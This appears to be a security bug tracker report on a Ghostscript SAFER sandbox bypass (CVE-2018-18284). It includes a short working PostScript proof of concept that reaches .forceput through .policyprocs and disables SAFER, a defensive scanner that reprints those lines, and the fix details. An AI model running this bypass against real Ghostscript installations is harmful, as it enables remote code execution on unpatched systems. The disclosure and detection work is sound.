Issue 1696

Issue metadata

Status: Fixed
Closed: Oct 16
Blocking: issue 1682




ghostscript: 1Policy is a dangerous operator, but callers are not odef

Project Member Reported by taviso@google.com, Oct 12

Issue description

This operator from gs_setpd.ps is correctly marked as executeonly and marked as a pseudo-operator (odef):

% Apply Policies to any unprocessed failed requests.
% As we process each request entry, we replace the error name
% in the <failed> dictionary with the policy value,
% and we replace the key in the <merged> dictionary with its prior value
% (or remove it if it had no prior value).

% Making this an operator means we can properly hide
% the contents - specifically .forceput
/1Policy
{
  % Roll back the failed request to its previous status.
  SETPDDEBUG { (Rolling back.) = pstack flush } if
  3 index 2 index 3 -1 roll .forceput
  4 index 1 index .knownget
   { 4 index 3 1 roll .forceput }
   { 3 index exch .undef }
  ifelse
} bind executeonly odef


But the operator itself doesn't do very much except pass the parameters to .forceput, therefore any procedure that calls this pseudo-operator should itself be a pseudo-operator (I know, I know, this is some arcane postscript).

Because the callers are not executeonly or pseudo-operators, we can just extract a reference to it and take complete control of ghostscript:

GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>SAFER ==
false

For a full exploit once you have .forceput, see bug 1682.

This is a critical remote code execution vulnerability.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
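The report above names the handful of PostScript operators involved (.forceput, .policyprocs, 1Policy) and the SAFER flag the proof of concept flips. For triage of untrusted PostScript or PDF-embedded PostScript, a cheap indicator is whether any of those names appear as executable code rather than inside a comment or string. The scanner below is an added example written for this page; it is not code from the report or from Ghostscript, and the set of flagged names and the one-line-at-a-time tokenizer are choices made here, not anything Ghostscript itself does.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Names taken from the report. Their presence as executable tokens in an
# untrusted document is an indicator worth a closer look, not proof of attack.
SUSPICIOUS_NAMES = {
    ".forceput": "privileged dictionary write that bypasses access checks",
    ".policyprocs": "array through which non-odef callers reach 1Policy",
    "1Policy": "executeonly odef operator that wraps .forceput",
    "SAFER": "sandbox flag in systemdict",
}

# A PostScript name token: optional leading '/', then a run of characters that
# are neither whitespace nor PostScript delimiters.
NAME_RE = re.compile(r"/?([^\s()<>\[\]{}/%]+)")


@dataclass
class Finding:
    line: int
    name: str
    reason: str


def strip_strings_and_comments(line: str) -> str:
    """Blank out (...) strings (nested, backslash escapes honoured) and cut the
    line at a '%' comment, so names mentioned only there are not reported."""
    out = []
    depth = 0
    i = 0
    while i < len(line):
        c = line[i]
        if depth == 0 and c == "%":
            break  # comment runs to end of line
        if c == "\\" and depth > 0:
            i += 2  # skip an escaped character inside a string
            continue
        if c == "(":
            depth += 1
            out.append(" ")
        elif c == ")" and depth > 0:
            depth -= 1
            out.append(" ")
        elif depth == 0:
            out.append(c)
        else:
            out.append(" ")  # character inside a string: blank it
        i += 1
    return "".join(out)


def scan_postscript(text: str) -> list[Finding]:
    """Return one Finding per flagged name token, in document order."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        code = strip_strings_and_comments(raw)
        for m in NAME_RE.finditer(code):
            name = m.group(1)
            if name in SUSPICIOUS_NAMES:
                findings.append(Finding(lineno, name, SUSPICIOUS_NAMES[name]))
    return findings


# Constructed sample: two benign lines that only mention the names in a comment
# or a string, followed by the three lines of the report's proof of concept
# with the "GS>" prompt removed.
SAMPLE = """\
% benign: .forceput appears only in this comment
(a string mentioning .policyprocs) show
/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def
systemdict /SAFER false .forceput
SAFER ==
"""

if __name__ == "__main__":
    for f in scan_postscript(SAMPLE):
        print(f"line {f.line}: {f.name} - {f.reason}")
```

Run against the constructed sample, the first two lines produce nothing and the three proof-of-concept lines produce five findings. The check is deliberately coarse: Ghostscript's own initialisation files (gs_setpd.ps among them) legitimately contain these names, so it belongs in front of untrusted input, and it is no substitute for installing a Ghostscript build that carries the fix.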

Project Member

Comment 1 by taviso@google.com, Oct 12

This is ghostscript bug 699963

https://bugs.ghostscript.com/show_bug.cgi?id=699963

Project Member

Comment 2 by taviso@google.com, Oct 12

Blocking: 1682

Project Member

Comment 3 by taviso@google.com, Oct 13

Labels: CVE-2018-18284
This is CVE-2018-18284

Project Member

Comment 4 by taviso@google.com, Oct 16

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
Fixed in http://git.ghostscript.com/?p=ghostpdl.git;h=8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b

I've sent a heads-up to oss-security.

Project Member

Comment 5 by taviso@google.com, Oct 17

Here is an exploit, just for future reference.

Attachment: executeonly-bypass.pdf (1.9 KB)
